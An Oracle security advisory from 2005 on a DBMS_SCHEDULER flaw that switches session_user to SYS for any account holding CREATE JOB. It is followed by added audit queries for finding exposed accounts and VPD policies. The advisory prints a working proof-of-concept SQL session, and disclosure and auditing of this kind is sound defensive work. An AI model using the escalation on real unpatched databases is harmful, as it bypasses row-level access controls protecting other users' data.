DBMS_SCHEDULER SESSION_USER issue in Oracle 10g
Details

The following proof of concept exploit code (from Metalink) allows any user with the CREATE JOB privilege to switch the session_user to SYS. The session_user value is often used together with VPD (Virtual Private Database) or OLS (Oracle Label Security), so the switch could allow privilege escalation. The old, deprecated current_user shows the right user.

Example

Connect as a user with the CREATE JOB privilege:

    SQL> select user from dual;

    USER
    ---------
    JOBUSER

    SQL> execute dbms_scheduler.run_job('ANY_JOB');

    PL/SQL procedure successfully completed.

    SQL> select user from dual;

    USER
    ---------
    SYS

    SQL> select (sys_context('userenv','session_user')) from dual;

    USER
    ---------
    SYS

    SQL> select (sys_context('userenv','current_user')) from dual;

    USER
    ---------
    JOBUSER

    SQL> show user
    USER is "jobuser"

Patch Information

Apply the patches for Oracle Critical Patch Update October 2005.

History

05-may-2005 US CERT VU# added (V1.01)
07-may-2005 Oracle removed the forum entry from Metalink (V1.02)
18-oct-2005 Oracle released CPU October 2005

© 2005 by Red-Database-Security GmbH - last update 02-nov-2005
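To scope exposure to the issue described above, the following audit queries are an added example, not part of the original advisory or of Oracle's patch. They assume a session that can read the DBA_* dictionary views, and they list which accounts can reach CREATE JOB and which VPD policy functions depend on session_user.

```sql
-- Added audit example; assumes SELECT access to the DBA_* dictionary views.

-- 1. Accounts holding CREATE JOB or CREATE ANY JOB, directly or through a
--    chain of roles. A row with granted_via = 'PUBLIC' means every account.
SELECT g.account, sp.privilege, sp.grantee AS granted_via
FROM   dba_sys_privs sp,
       (SELECT username AS account, username AS holder
        FROM   dba_users
        UNION
        -- No START WITH: every role grant is a root, so each grantee is
        -- paired with every role it reaches at any depth.
        SELECT CONNECT_BY_ROOT grantee, granted_role
        FROM   dba_role_privs
        CONNECT BY PRIOR granted_role = grantee) g
WHERE  sp.grantee = g.holder
AND    sp.privilege IN ('CREATE JOB', 'CREATE ANY JOB')
AND    (g.account = 'PUBLIC'
        OR g.account IN (SELECT username FROM dba_users))
ORDER  BY g.account, sp.privilege;

-- 2. VPD policies whose policy function source references SESSION_USER.
--    Wrapped (obfuscated) PL/SQL will not match and must be reviewed by hand.
--    Policy functions that call the USER function are affected in the same
--    way (see the session above) but are too noisy to match by text search.
SELECT p.object_owner, p.object_name, p.policy_name,
       s.owner AS source_owner, s.name AS source_name, s.type, s.line
FROM   dba_policies p,
       dba_source   s
WHERE  s.owner = p.pf_owner
AND    s.name  = NVL(p.package, p.function)
AND    UPPER(s.text) LIKE '%SESSION_USER%'
ORDER  BY p.object_owner, p.object_name, s.name, s.line;
```

Accounts returned by the first query on a database without CPU October 2005 are the ones whose session_user cannot be trusted by the policies returned by the second.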